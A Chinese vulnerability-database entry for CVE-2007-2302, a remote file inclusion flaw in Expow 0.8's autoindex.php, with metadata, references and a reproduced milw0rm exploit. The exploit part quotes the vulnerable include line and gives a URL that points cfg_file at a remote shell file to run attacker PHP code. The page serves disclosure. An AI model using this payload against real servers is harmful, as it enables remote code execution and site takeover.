Expow Autoindex.PHP 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112696 漏洞类型 输入验证
发布时间 2007-04-12 更新时间 2007-04-27
CVE编号 CVE-2007-2302 CNNVD-ID CNNVD-200704-558
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3722
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-558
|漏洞详情
Expow的autoindex.php中存在PHP远程文件包含漏洞。远程攻击者可以借助cfg_file参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
Expow 0.8 File manager  Autoindex.php (cfg_file) Remote File Inclusion Vulnerability
__________________________________________________________________________
found by : mdx
--------------------------------------------------------------------------
Download script : http://sourceforge.net/project/downloading.php?group_id=29595&use_mirror=kent&filename=expow-0.8.tar.gz&92927218
--------------------------------------------------------------------------
file name : autoindex.php
__________________________________________________________________________
Ýncluded line ;

  if (!include($cfg_file))

__________________________________________________________________________
Exploit :

http://site.com/[path]/autoindex.php?cfg_file=shellmdx.txt?

# milw0rm.com [2007-04-12]
|参考资料

来源:XF
名称:expow-autoindex-file-include(33619)
链接:http://xforce.iss.net/xforce/xfdb/33619
来源:BID
名称:23464
链接:http://www.securityfocus.com/bid/23464
来源:MILW0RM
名称:3722
链接:http://www.milw0rm.com/exploits/3722
来源:OSVDB
名称:35731
链接:http://osvdb.org/35731